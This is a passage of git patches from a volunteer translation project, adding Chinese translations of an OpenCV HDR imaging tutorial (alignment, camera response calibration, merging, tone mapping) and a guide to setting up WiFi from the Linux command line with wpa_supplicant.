+大多数数码相机和显示器都是按照24位矩阵捕获或者显示彩色图像。 每个颜色通道有8位,因此每个通道的像素值在0-255范围内。 换句话说,普通的相机或者显示器的动态范围是有限的。
+
+但是,我们周围世界的动态范围极大。 在车库内关灯就会变得漆黑,直接看着太阳则会非常刺眼。 即使不考虑这些极端情况,在日常场景中,8位的通道也只能勉强覆盖现场的动态范围。 因此,相机会尝试评估光照并自动设置曝光,使图像中感兴趣的区域具有良好的动态范围,而太暗和太亮的部分则分别被截断为0和255。
+
+在下图中,左侧的图像是正常曝光的图像。 请注意,由于相机采用了适合拍摄主体(我的儿子)的曝光设置,背景中明亮的天空完全过曝,细节已经丢失。 右侧的图像是由iPhone生成的HDR图像。
+
+ [![High Dynamic Range (HDR)](http://www.learnopencv.com/wp-content/uploads/2017/09/high-dynamic-range-hdr.jpg)][3]
+
+iPhone是如何拍摄HDR图像的呢? 它实际上采用三种不同的曝光度拍摄了3张图像,3张图像拍摄非常迅速,在3张图像之间几乎没有产生位移。然后组合三幅图像来产生HDR图像。 我们将在下一节看到一些细节。
+
+将在不同曝光设置下获取的相同场景的不同图像组合的过程称为高动态范围(HDR)成像。
+
+### 高动态范围(HDR)成像是如何工作的?
+
+在本节中,我们来看下使用OpenCV创建HDR图像的步骤。
+
+要想轻松学习本教程,请点击[此处][5][下载][4]C ++和Python代码还有图像。 如果您有兴趣了解更多关于人工智能,计算机视觉和机器学习的信息,请[订阅][6]我们的电子杂志。
+
+### 第1步:捕获不同曝光度的多张图像
+
+当我们使用相机拍照时,每个通道只有8位来表示场景的动态范围(亮度范围)。 但是,通过改变快门速度,我们可以在不同的曝光条件下拍摄多个场景图像。 大多数单反相机SLR有一个功能称为自动包围式曝光(AEB),只需按一下按钮,我们就可以在不同的曝光下拍摄多张照片。 如果你正在使用iPhone,你可以使用这个[自动包围式HDR应用程序][7],如果你是一个Android用户,你可以尝试一个[更好的相机应用程序][8]。
+
+场景没有变化时,在相机上使用自动包围式曝光或在手机上使用自动包围式应用程序,我们可以一张接一张地快速拍摄多张照片。 当我们在iPhone中使用HDR模式时,会拍摄三张照片。
+
+1. 曝光不足的图像:该图像比正确曝光的图像更暗。 目标是捕捉非常明亮的图像部分。
+2. 正确曝光的图像:这是相机将根据其估计的照明拍摄的常规图像。
+3. 曝光过度的图像:该图像比正确曝光的图像更亮。 目标是拍摄非常黑暗的图像部分。
+
+但是,如果场景的动态范围很大,我们可以拍摄三张以上的图片来合成HDR图像。 在本教程中,我们将使用曝光时间为1/30秒,0.25秒,2.5秒和15秒的4张图像。 缩略图如下所示。
+
+ [![Auto Exposure Bracketed HDR image sequence](http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-image-sequence.jpg)][9]
+
+单反相机或手机的曝光时间和其他设置的信息通常存储在JPEG文件的EXIF元数据中。 查看此[链接][10]可查看Windows和Mac中存储在JPEG文件中的EXIF元数据。 或者,您可以使用我最喜欢的名为[EXIFTOOL][11]的查看EXIF的命令行工具。
+
+我们先从读取各张图像及其对应的曝光时间开始。
+
+C++
+
+```
+void readImagesAndTimes(vector<Mat> &images, vector<float> &times)
+{
+
+ int numImages = 4;
+
+ // 曝光时间列表
+ static const float timesArray[] = {1/30.0f,0.25,2.5,15.0};
+ times.assign(timesArray, timesArray + numImages);
+
+ // 图像文件名称列表
+ static const char* filenames[] = {"img_0.033.jpg", "img_0.25.jpg", "img_2.5.jpg", "img_15.jpg"};
+ for(int i=0; i < numImages; i++)
+ {
+ Mat im = imread(filenames[i]);
+ images.push_back(im);
+ }
+
+}
+```
+
+Python
+
+```
+def readImagesAndTimes():
+ # 曝光时间列表
+ times = np.array([ 1/30.0, 0.25, 2.5, 15.0 ], dtype=np.float32)
+
+ # 图像文件名称列表
+ filenames = ["img_0.033.jpg", "img_0.25.jpg", "img_2.5.jpg", "img_15.jpg"]
+ images = []
+ for filename in filenames:
+ im = cv2.imread(filename)
+ images.append(im)
+
+ return images, times
+```
+
+### 第2步:对齐图像
+
+合成HDR图像时,如果所用的图像未对齐,可能会产生严重的伪影。 在下图中,左侧是使用未对齐的图像合成的HDR图像,右侧则使用了对齐后的图像。 放大图中用红色圆圈标出的部分,我们会在左侧图像中看到严重的鬼影。
+
+ [![Misalignment problem in HDR](http://www.learnopencv.com/wp-content/uploads/2017/10/aligned-unaligned-hdr-comparison.jpg)][12]
+
+在拍摄照片制作HDR图像时,专业摄影师自然是将相机安装在三脚架上。 他们还使用称为[镜像锁定][13]功能来减少额外的振动。 即使如此,图像可能仍然没有完美对齐,因为没有办法保证无振动的环境。 使用手持相机或手机拍摄图像时,对齐问题会变得更糟。
+
+幸运的是,OpenCV提供了一种简单的方法,使用`AlignMTB`来对齐这些图像。 该算法将所有图像转换为中值阈值位图(MTB)。 图像的MTB的生成方式为:将比中值亮度更亮的像素置为1,其余置为0。 MTB不随曝光时间的改变而改变。 因此,对齐MTB时不需要我们指定曝光时间。
+
+基于MTB的对齐方式的代码如下。
+
+C++
+
+```
+// 对齐输入图像
+Ptr<AlignMTB> alignMTB = createAlignMTB();
+alignMTB->process(images, images);
+```
+
+Python
+
+```
+# 对齐输入图像
+alignMTB = cv2.createAlignMTB()
+alignMTB.process(images, images)
+```
+
+### 第3步:提取相机响应函数
+
+典型相机的响应与场景亮度不成线性关系。 那是什么意思呢? 假设有两个物体由同一个相机拍摄,在现实世界中其中一个物体是另一个物体亮度的两倍。 当您测量照片中两个物体的像素亮度时,较亮物体的像素值将不会是较暗物体的两倍。 在不估计相机响应函数(CRF)的情况下,我们将无法将图像合并到一个HDR图像中。
+
+将多个曝光图像合并为HDR图像意味着什么?
+
+只考虑图像中某个位置(x,y)处的一个像素。 如果CRF是线性的,那么像素值将直接与曝光时间成比例,除非该像素在某张图像中太暗(即接近0)或太亮(即接近255)。 我们可以过滤掉这些不好的像素(太暗或太亮的像素),将像素值除以曝光时间来估计像素的亮度,然后在该像素为“好”像素(既不太暗也不太亮)的所有图像上对亮度值取平均。 对所有像素都做这样的处理,就可以通过对“好”像素取平均得到一张结果图像。
+
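+下面是一段示意性的 NumPy 代码(并非原文内容,仅用来说明上面这段思路;它假设 CRF 是线性的,images 和 times 来自第 1 步的 readImagesAndTimes()):
+
+```
+# 朴素的线性合并(示意代码):过滤掉太暗或太亮的像素,把像素值除以曝光时间后取平均
+import numpy as np
+
+num = np.zeros(images[0].shape, dtype=np.float32)
+den = np.zeros(images[0].shape, dtype=np.float32)
+for im, t in zip(images, times):
+    im = im.astype(np.float32)
+    good = ((im > 5) & (im < 250)).astype(np.float32)  # “好”像素:既不太暗也不太亮
+    num += good * (im / t)                             # 像素值除以曝光时间来估计亮度
+    den += good
+naiveHdr = num / (den + 1e-6)
+```
+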
+但是CRF不是线性的, 我们需要评估CRF把图像强度变成线性,然后才能合并或者平均它们。
+
+好消息是,如果我们知道每张图像的曝光时间,就可以从这些图像中估计出CRF。 与计算机视觉中的许多问题一样,求CRF本质上是一个最优化问题,其目标是使由数据项和平滑项组成的目标函数最小化。 这类问题通常可以归结为线性最小二乘问题,而线性最小二乘问题可以用奇异值分解(SVD)来求解,SVD是所有线性代数软件包都提供的功能。 CRF估计算法的细节可以在[从照片提取高动态范围辐射图][14]这篇论文中找到。
+
+使用OpenCV的`CalibrateDebevec`或者`CalibrateRobertson`,只需2行代码就可以求出CRF。本篇教程中我们使用 `CalibrateDebevec`。
+
+C++
+
+```
+// 获取图像响应函数 (CRF)
+Mat responseDebevec;
+Ptr<CalibrateDebevec> calibrateDebevec = createCalibrateDebevec();
+calibrateDebevec->process(images, responseDebevec, times);
+
+```
+
+Python
+
+```
+# 获取图像响应函数 (CRF)
+calibrateDebevec = cv2.createCalibrateDebevec()
+responseDebevec = calibrateDebevec.process(images, times)
+```
+
+下图显示了使用红绿蓝通道的图像提取的CRF。
+
+ [![Camera Response Function](http://www.learnopencv.com/wp-content/uploads/2017/10/camera-response-function.jpg)][15]
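+
+如果想自己把估计出的 CRF 画出来,可以用 matplotlib(示意代码,并非原文内容;这里假设 responseDebevec 的形状为 256×1×3,通道顺序为 BGR):
+
+```
+# 绘制三个通道的相机响应函数(示意)
+import matplotlib.pyplot as plt
+
+for i, c in enumerate(["b", "g", "r"]):
+    plt.plot(responseDebevec[:, 0, i], color=c, label=c)
+plt.xlabel("Pixel value")
+plt.ylabel("Relative response")
+plt.legend()
+plt.show()
+```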
+
+### 第4步:合并图像
+
+一旦估计出CRF,我们就可以使用`MergeDebevec`将多张曝光图像合并成一幅HDR图像。 C++和Python代码如下所示。
+
+C++
+
+```
+// 将图像合并为HDR线性图像
+Mat hdrDebevec;
+Ptr<MergeDebevec> mergeDebevec = createMergeDebevec();
+mergeDebevec->process(images, hdrDebevec, times, responseDebevec);
+// 保存图像
+imwrite("hdrDebevec.hdr", hdrDebevec);
+```
+
+Python
+
+```
+# 将图像合并为HDR线性图像
+mergeDebevec = cv2.createMergeDebevec()
+hdrDebevec = mergeDebevec.process(images, times, responseDebevec)
+# 保存图像
+cv2.imwrite("hdrDebevec.hdr", hdrDebevec)
+```
+
+上面保存的HDR图像可以在Photoshop中加载并进行色调映射。示例图像如下所示。
+
+ [![HDR Photoshop tone mapping](http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Photoshop-Tonemapping-1024x770.jpg)][16] HDR Photoshop 色调映射
+
+### 第5步:色调映射
+
+现在我们已经将我们的曝光图像合并到一个HDR图像中。 你能猜出这个图像的最小和最大像素值吗? 对于黑色条件,最小值显然为0。 理论最大值是什么? 无限大! 在实践中,不同情况下的最大值是不同的。 如果场景包含非常明亮的光源,那么最大值就会非常大。
+
+尽管我们已经使用多个图像恢复了相对亮度信息,但是我们现在又面临了新的挑战:将这些信息保存为24位图像用于显示。
+
+将高动态范围(HDR)图像转换为每通道8位的图像、同时尽可能保留细节的过程,称为色调映射。
+
+色调映射算法有很多种,OpenCV实现了其中的四种。 要记住的是,色调映射没有一个绝对正确的做法。 通常,我们希望在色调映射后的图像中看到比任何一张曝光图像都更多的细节。 有时色调映射的目标是产生逼真的图像,而有时目标则是产生超现实的图像。 OpenCV中实现的算法倾向于产生逼真、因而不那么夸张的结果。
+
+我们来看看各种选项。 以下列出了不同色调映射算法的一些常见参数。
+
+1. 伽马gamma:该参数通过应用伽马gamma校正来压缩动态范围。 当gamma等于1时,不应用修正。 小于1的伽玛会使图像变暗,而大于1的伽马会使图像变亮。
+2. 饱和度saturation:该参数用于增加或减少饱和度。 饱和度高时,色彩更丰富,更浓。 饱和度值接近零,使颜色逐渐消失为灰度。
+3. 对比度contrast:控制输出图像的对比度(即log (maxPixelValue/minPixelValue))。
+
+让我们来探索OpenCV中可用的四种色调映射算法。
+
+#### Drago 色调映射
+
+Drago 色调映射的参数如下所示
+
+```
+createTonemapDrago
+(
+float gamma = 1.0f,
+float saturation = 1.0f,
+float bias = 0.85f
+)
+```
+
+这里,bias是[0,1]范围内偏差函数的值。 从0.7到0.9的值通常效果较好。 默认值是0.85。 有关更多技术细节,请参阅这篇[论文][17]。
+
+C ++和Python代码如下所示。 参数是通过反复试验获得的。 最后的结果乘以3只是因为它给出了最令人满意的结果。
+
+C++
+
+```
+// 使用Drago色调映射算法获得24位彩色图像
+Mat ldrDrago;
+Ptr<TonemapDrago> tonemapDrago = createTonemapDrago(1.0, 0.7);
+tonemapDrago->process(hdrDebevec, ldrDrago);
+ldrDrago = 3 * ldrDrago;
+imwrite("ldr-Drago.jpg", ldrDrago * 255);
+```
+
+Python
+
+```
+# 使用Drago色调映射算法获得24位彩色图像
+tonemapDrago = cv2.createTonemapDrago(1.0, 0.7)
+ldrDrago = tonemapDrago.process(hdrDebevec)
+ldrDrago = 3 * ldrDrago
+cv2.imwrite("ldr-Drago.jpg", ldrDrago * 255)
+```
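+
+顺带一提,保存之前也可以显式地把浮点结果裁剪并转换成 8 位,而不是依赖 imwrite 的隐式转换(示意代码,并非原文内容;假设 ldrDrago 是取值大致在 0~1 的 float32 图像):
+
+```
+# 显式裁剪到 [0, 255] 并转换为 uint8 后再保存(示意)
+import numpy as np
+
+ldrDrago8 = np.clip(ldrDrago * 255, 0, 255).astype("uint8")
+cv2.imwrite("ldr-Drago-8bit.jpg", ldrDrago8)
+```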
+
+结果如下
+
+ [![HDR tone mapping using Drago's algorithm](http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Drago-1024x770.jpg)][18] 使用Drago算法的HDR色调映射
+
+#### Durand 色调映射
+
+Durand 色调映射的参数如下所示
+
+```
+createTonemapDurand
+(
+ float gamma = 1.0f,
+ float contrast = 4.0f,
+ float saturation = 1.0f,
+ float sigma_space = 2.0f,
+ float sigma_color = 2.0f
+);
+```
+该算法基于将图像分解为基础层和细节层。 使用称为双边滤波器的边缘保留滤波器来获得基本层。 sigma_space和sigma_color是双边滤波器的参数,分别控制空间域和彩色域中的平滑量。
+
+有关更多详细信息,请查看这篇[论文][19]。
+
+C++
+
+```
+// 使用Durand色调映射算法获得24位彩色图像
+Mat ldrDurand;
+Ptr<TonemapDurand> tonemapDurand = createTonemapDurand(1.5, 4, 1.0, 1, 1);
+tonemapDurand->process(hdrDebevec, ldrDurand);
+ldrDurand = 3 * ldrDurand;
+imwrite("ldr-Durand.jpg", ldrDurand * 255);
+```
+Python
+
+```
+# 使用Durand色调映射算法获得24位彩色图像
+tonemapDurand = cv2.createTonemapDurand(1.5, 4, 1.0, 1, 1)
+ldrDurand = tonemapDurand.process(hdrDebevec)
+ldrDurand = 3 * ldrDurand
+cv2.imwrite("ldr-Durand.jpg", ldrDurand * 255)
+```
+
+结果如下
+
+ [![HDR tone mapping using Durand's algorithm](http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Durand-1024x770.jpg)][20] 使用Durand算法的HDR色调映射
+
+#### Reinhard 色调映射
+
+```
+
+createTonemapReinhard
+(
+float gamma = 1.0f,
+float intensity = 0.0f,
+float light_adapt = 1.0f,
+float color_adapt = 0.0f
+)
+```
+
+intensity 参数应在[-8, 8]范围内。 intensity 值越大,结果越明亮。 light_adapt 控制光照自适应程度,范围为[0, 1]。 值为1表示仅基于像素值进行自适应,值为0表示全局自适应,中间值则是两者的加权组合。 参数 color_adapt 控制色度自适应,范围为[0, 1]。 值为1时各通道被独立处理,值为0时每个通道的自适应程度相同,中间值则是两者的加权组合。
+
+有关更多详细信息,请查看这篇[论文][21]。
+
+C++
+
+```
+// 使用Reinhard色调映射算法获得24位彩色图像
+Mat ldrReinhard;
+Ptr<TonemapReinhard> tonemapReinhard = createTonemapReinhard(1.5, 0, 0, 0);
+tonemapReinhard->process(hdrDebevec, ldrReinhard);
+imwrite("ldr-Reinhard.jpg", ldrReinhard * 255);
+```
+
+Python
+
+```
+# 使用Reinhard色调映射算法获得24位彩色图像
+tonemapReinhard = cv2.createTonemapReinhard(1.5, 0,0,0)
+ldrReinhard = tonemapReinhard.process(hdrDebevec)
+cv2.imwrite("ldr-Reinhard.jpg", ldrReinhard * 255)
+```
+
+结果如下
+
+ [![HDR tone mapping using Reinhard's algorithm](http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Reinhard-1024x770.jpg)][22] 使用Reinhard算法的HDR色调映射
+
+#### Mantiuk 色调映射
+
+```
+createTonemapMantiuk
+(
+float gamma = 1.0f,
+float scale = 0.7f,
+float saturation = 1.0f
+)
+```
+
+参数scale是对比度比例因子。 从0.6到0.9的值通常效果较好。
+
+有关更多详细信息,请查看这篇[论文][23]。
+
+C++
+
+```
+// 使用Mantiuk色调映射算法获得24位彩色图像
+Mat ldrMantiuk;
+Ptr<TonemapMantiuk> tonemapMantiuk = createTonemapMantiuk(2.2, 0.85, 1.2);
+tonemapMantiuk->process(hdrDebevec, ldrMantiuk);
+ldrMantiuk = 3 * ldrMantiuk;
+imwrite("ldr-Mantiuk.jpg", ldrMantiuk * 255);
+```
+
+Python
+
+```
+# 使用Mantiuk色调映射算法获得24位彩色图像
+tonemapMantiuk = cv2.createTonemapMantiuk(2.2,0.85, 1.2)
+ldrMantiuk = tonemapMantiuk.process(hdrDebevec)
+ldrMantiuk = 3 * ldrMantiuk
+cv2.imwrite("ldr-Mantiuk.jpg", ldrMantiuk * 255)
+```
+
+结果如下
+
+ [![HDR tone mapping using Mantiuk's algorithm](http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Mantiuk-1024x770.jpg)][24] 使用Mantiuk算法的HDR色调映射
+
+### 订阅然后下载代码
+
+如果你喜欢这篇文章,并希望下载本文中使用的代码(C ++和Python)和示例图片,请[订阅][25]我们的电子杂志。 您还将获得免费的[计算机视觉资源][26]指南。 在我们的电子杂志中,我们分享了用C ++还有Python编写的OpenCV教程和例子,以及计算机视觉和机器学习的算法和新闻。
+
+[点此订阅][27]
+
+图像学分
+
+本文中使用的四个曝光图像获得[CC BY-SA 3.0][28]许可,并从[维基百科的HDR页面][29]下载。 图像由Kevin McCoy拍摄。
+
+--------------------------------------------------------------------------------
+
+作者简介:
+
+我是一位热爱计算机视觉和机器学习的企业家,拥有十多年的实践经验(还有博士学位)。
+
+2007年,在完成博士学位之后,我和我的导师David Kriegman博士以及Kevin Barnes共同创办了TAAZ公司。 我们的计算机视觉和机器学习算法的可扩展性和鲁棒性,已经经受了超过1亿试用过我们产品的用户的严格检验。
+
+---------------------------
+
+via: http://www.learnopencv.com/high-dynamic-range-hdr-imaging-using-opencv-cpp-python/
+
+作者:[SATYA MALLICK ][a]
+译者:[Flowsnow](https://github.com/Flowsnow)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://www.learnopencv.com/about/
+[1]:http://www.learnopencv.com/author/spmallick/
+[2]:http://www.learnopencv.com/high-dynamic-range-hdr-imaging-using-opencv-cpp-python/#disqus_thread
+[3]:http://www.learnopencv.com/wp-content/uploads/2017/09/high-dynamic-range-hdr.jpg
+[4]:http://www.learnopencv.com/wp-content/uploads/2017/10/hdr.zip
+[5]:http://www.learnopencv.com/wp-content/uploads/2017/10/hdr.zip
+[6]:https://bigvisionllc.leadpages.net/leadbox/143948b73f72a2%3A173c9390c346dc/5649050225344512/
+[7]:https://itunes.apple.com/us/app/autobracket-hdr/id923626339?mt=8&ign-mpt=uo%3D8
+[8]:https://play.google.com/store/apps/details?id=com.almalence.opencam&hl=en
+[9]:http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-image-sequence.jpg
+[10]:https://www.howtogeek.com/289712/how-to-see-an-images-exif-data-in-windows-and-macos
+[11]:https://www.sno.phy.queensu.ca/~phil/exiftool
+[12]:http://www.learnopencv.com/wp-content/uploads/2017/10/aligned-unaligned-hdr-comparison.jpg
+[13]:https://www.slrlounge.com/workshop/using-mirror-up-mode-mirror-lockup
+[14]:http://www.pauldebevec.com/Research/HDR/debevec-siggraph97.pdf
+[15]:http://www.learnopencv.com/wp-content/uploads/2017/10/camera-response-function.jpg
+[16]:http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Photoshop-Tonemapping.jpg
+[17]:http://resources.mpi-inf.mpg.de/tmo/logmap/logmap.pdf
+[18]:http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Drago.jpg
+[19]:https://people.csail.mit.edu/fredo/PUBLI/Siggraph2002/DurandBilateral.pdf
+[20]:http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Durand.jpg
+[21]:http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.106.8100&rep=rep1&type=pdf
+[22]:http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Reinhard.jpg
+[23]:http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.60.4077&rep=rep1&type=pdf
+[24]:http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Mantiuk.jpg
+[25]:https://bigvisionllc.leadpages.net/leadbox/143948b73f72a2%3A173c9390c346dc/5649050225344512/
+[26]:https://bigvisionllc.leadpages.net/leadbox/143948b73f72a2%3A173c9390c346dc/5649050225344512/
+[27]:https://bigvisionllc.leadpages.net/leadbox/143948b73f72a2%3A173c9390c346dc/5649050225344512/
+[28]:https://creativecommons.org/licenses/by-sa/3.0/
+[29]:https://en.wikipedia.org/wiki/High-dynamic-range_imaging
From 8237dcca7f48be180605515bed6d0d16f4edc702 Mon Sep 17 00:00:00 2001
From: darksun
Date: Wed, 10 Jan 2018 21:41:32 +0800
Subject: [PATCH 221/371] translate done: 20171002 Connect To Wifi From The
Linux Command Line.md
---
...ect To Wifi From The Linux Command Line.md | 119 ------------------
...ect To Wifi From The Linux Command Line.md | 109 ++++++++++++++++
2 files changed, 109 insertions(+), 119 deletions(-)
delete mode 100644 sources/tech/20171002 Connect To Wifi From The Linux Command Line.md
create mode 100644 translated/tech/20171002 Connect To Wifi From The Linux Command Line.md
diff --git a/sources/tech/20171002 Connect To Wifi From The Linux Command Line.md b/sources/tech/20171002 Connect To Wifi From The Linux Command Line.md
deleted file mode 100644
index de47cf50a8..0000000000
--- a/sources/tech/20171002 Connect To Wifi From The Linux Command Line.md
+++ /dev/null
@@ -1,119 +0,0 @@
-translating by lujun9972
-Connect To Wifi From The Linux Command Line
-======
-
-### Objective
-
-Configure WiFi using only command line utilities.
-
-### Distributions
-
-This will work on any major Linux distribution.
-
-### Requirements
-
-A working Linux install with root privileges and a compatible wireless network adapter.
-
-### Difficulty
-
-Easy
-
-### Conventions
-
- * **#** \- requires given command to be executed with root privileges either directly as a root user or by use of `sudo` command
- * **$** \- given command to be executed as a regular non-privileged user
-
-
-
-### Introduction
-
-Lots of people like graphical utilities for managing their computers, but plenty of people don't. If you prefer command line utilities, managing WiFi can be a real pain. Well, it doesn't have to be.
-
-wpa_supplicant can be used as a command line utility. You can actually set it up easily with a simple configuration file.
-
-### Scan For Your Network
-
-If you already know your network information, you can skip this step. If not, it's a good way to figure out some info about the network you're connecting to.
-
-wpa_supplicant comes with a tool called `wpa_cli` which provides a command line interface to manage your WiFi connections. You can actually use it to set up everything, but setting up a configuration file seems a bit easier.
-
-Run `wpa_cli` with root privileges, then scan for networks.
-```
-
-# wpa_cli
-> scan
-
-```
-
-The scan will take a couple of minutes, and show you the networks in your area. Notate the one you want to connect to. Type `quit` to exit.
-
-### Generate a Block and Encrypt Your Password
-
-There's an even more convenient utility that you can use to begin setting up your configuration file. It takes the name of your network and the password and creates a file with a configuration block for that network with the password encrypted, so it's not stored in plain text.
-```
-
-# wpa_passphrase networkname password > /etc/wpa_supplicant/wpa_supplicant.conf
-
-```
-
-### Tailor Your Configuration
-
-Now, you have a configuration file located at `/etc/wpa_supplicant/wpa_supplicant.conf`. It's not much, just the network block with your network name and password, but you can build it out from there.
-
-Open your file in your favorite editor, and start by deleting the commented-out password line. Then, add the following line to the top of the configuration.
-```
-ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=wheel
-
-```
-
-It just lets users in the `wheel` group manage wpa_supplicant. It can be convenient.
-
-Add the rest of this to the network block itself.
-
-If you're connecting to a hidden network, you can add the following line to tell wpa_supplicant to scan it first.
-```
-scan_ssid=1
-
-```
-
-Next, set the protocol and key management settings. These settings correspond to WPA2.
-```
-proto=RSN
-key_mgmt=WPA-PSK
-
-```
-
-The group and pairwise settings tell wpa_supplicant if you're using CCMP, TKIP, or both. For best security, you should only be using CCMP.
-```
-group=CCMP
-pairwise=CCMP
-
-```
-
-Finally, set the priority of the network. Higher values will connect first.
-```
-priority=10
-
-```
-
-
-![Complete WPA_Supplicant Settings][1]
-Save your configuration and restart wpa_supplicant for the changes to take effect.
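-
-For reference, a fully assembled file following the steps above might look roughly like this (illustrative only; "networkname" is a placeholder and the psk line comes from your own wpa_passphrase output):
-```
-ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=wheel
-
-network={
-	ssid="networkname"
-	scan_ssid=1
-	psk=<hash generated by wpa_passphrase>
-	proto=RSN
-	key_mgmt=WPA-PSK
-	group=CCMP
-	pairwise=CCMP
-	priority=10
-}
-```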
-
-### Closing Thoughts
-
-Certainly, this method isn't the best for configuring wireless networks on-the-fly, but it works very well for the networks that you connect to on a regular basis.
-
-
---------------------------------------------------------------------------------
-
-via: https://linuxconfig.org/connect-to-wifi-from-the-linux-command-line
-
-作者:[Nick Congleton][a]
-译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://linuxconfig.org
-[1]:https://linuxconfig.org/images/wpa-cli-config.jpg
diff --git a/translated/tech/20171002 Connect To Wifi From The Linux Command Line.md b/translated/tech/20171002 Connect To Wifi From The Linux Command Line.md
new file mode 100644
index 0000000000..50c25bd839
--- /dev/null
+++ b/translated/tech/20171002 Connect To Wifi From The Linux Command Line.md
@@ -0,0 +1,109 @@
+通过 Linux 命令行连接 Wifi
+======
+
+目标:仅使用命令行工具来配置 WiFi
+
+发行版:适用于任何主流 Linux 发行版。
+
+要求:安装了无线网卡的 Linux 并且拥有 root 权限。
+
+难度:简单
+
+约定:
+
+* `#` - 需要使用 root 权限来执行指定命令,可以直接使用 root 用户来执行,也可以使用 `sudo` 命令
+* `$` - 可以使用普通用户来执行指定命令
+
+
+### 简介
+
+许多人喜欢用图形化的工具来管理电脑,但也有很多人不喜欢这样做。如果你比较喜欢命令行工具,管理 WiFi 会是件很痛苦的事情。然而,事情本不该如此。
+
+wpa_supplicant 可以作为命令行工具来用。使用一个简单的配置文件就可以很容易地设置好 WiFi。
+
+### 扫描网络
+
+若你已经知道了网络的信息,就可以跳过这一步。如果不了解的话,则这是一个找出网络信息的好方法。
+
+wpa_supplicant 中有一个工具叫做 `wpa_cli`,它提供了一个命令行接口来管理你的 WiFi 连接。事实上你可以用它来设置任何东西,但是设置一个配置文件看起来要更容易一些。
+
+使用 root 权限运行 `wpa_cli`,然后扫描网络。
+```
+
+# wpa_cli
+> scan
+
+```
+
+扫描过程要花上一点时间,并且会显示所在区域的那些网络。记住你想要连接的那个网络。然后输入 `quit` 退出。
+
+### 生成配置块并且加密你的密码
+
+还有一个更方便的工具可以帮你起草配置文件。它接受网络名称和密码作为参数,然后生成一个包含该网络配置块的配置文件,其中的密码经过了加密(哈希)处理,因此不会以明文形式保存。
+```
+
+# wpa_passphrase networkname password > /etc/wpa_supplicant/wpa_supplicant.conf
+
+```
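+
+生成的文件内容大致如下(示意;这里的 ssid 是占位的网络名,实际的 psk 是由网络名和密码推导出来的 64 位十六进制值,明文密码会以注释形式保留,下一节会把那行注释删掉):
+
+```
+network={
+	ssid="networkname"
+	#psk="password"
+	psk=<由 wpa_passphrase 生成的 64 位十六进制值>
+}
+```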
+
+### 裁剪你的配置
+
+现在你已经有了一个配置文件了,这个配置文件就是 `/etc/wpa_supplicant/wpa_supplicant.conf`。其中的内容并不多,只有一个网络块,其中有网络名称和密码,不过你可以在此基础上对它进行修改。
+
+用喜欢的编辑器打开该文件,首先删掉记录着明文密码的那行注释。然后,将下面这行加到配置文件的最上方。
+```
+ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=wheel
+
+```
+
+这一行只是让 `wheel` 组中的用户可以管理 wpa_supplicant。这会方便很多。
+
+其他的内容则添加到网络块中。
+
+如果你要连接到一个隐藏网络,你可以添加下面行来通知 wpa_supplicant 先扫描该网络。
+```
+scan_ssid=1
+
+```
+
+下一步,设置协议以及密钥管理方面的配置。下面这些是 WPA2 相关的配置。
+```
+proto=RSN
+key_mgmt=WPA-PSK
+
+```
+
+group 和 pairwise 配置告诉 wpa_supplicant 你是否使用了 CCMP,TKIP,或者两者都用到了。为了安全考虑,你应该只用 CCMP。
+```
+group=CCMP
+pairwise=CCMP
+
+```
+
+最后,设置网络优先级。越高的值越会优先连接。
+```
+priority=10
+
+```
+
+![Complete WPA_Supplicant Settings][1]
+
+保存配置然后重启 wpa_supplicant 来让改动生效。
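+
+具体的重启方式取决于你的发行版(下面是示意命令,并非原文内容:若 wpa_supplicant 以 systemd 服务方式运行,可以用第一条;否则也可以手动在后台重新启动它,把 wlan0 换成你的无线网卡名):
+```
+# systemctl restart wpa_supplicant
+
+# wpa_supplicant -B -i wlan0 -c /etc/wpa_supplicant/wpa_supplicant.conf
+```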
+
+### 结语
+
+当然,该方法并不是用于即时配置无线网络的最好方法,但对于定期连接的网络来说,这种方法非常有效。
+
+
+--------------------------------------------------------------------------------
+
+via: https://linuxconfig.org/connect-to-wifi-from-the-linux-command-line
+
+作者:[Nick Congleton][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://linuxconfig.org
+[1]:https://linuxconfig.org/images/wpa-cli-config.jpg
From 669c4ec6db91154825f20278eaa17d10bd172428 Mon Sep 17 00:00:00 2001
From: Shucheng <741932183@qq.com>
Date: Wed, 10 Jan 2018 22:57:32 +0800
Subject: [PATCH 222/371] Translating by Drshu
---
...4 Restore Corrupted USB Drive To Original State In Linux.md | 3 +++
1 file changed, 3 insertions(+)
diff --git a/sources/tech/20171114 Restore Corrupted USB Drive To Original State In Linux.md b/sources/tech/20171114 Restore Corrupted USB Drive To Original State In Linux.md
index 11cbd66a11..4c9fea02c0 100644
--- a/sources/tech/20171114 Restore Corrupted USB Drive To Original State In Linux.md
+++ b/sources/tech/20171114 Restore Corrupted USB Drive To Original State In Linux.md
@@ -1,5 +1,8 @@
+Translating by Drshus
+
Restore Corrupted USB Drive To Original State In Linux
======
+
![](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/restore-corrupted-usb-drive-to-original-state-in-linux_orig.jpg)
Many times our storage devices like sd cards and Pen drives get corrupted and unusable due to one or other reasons.
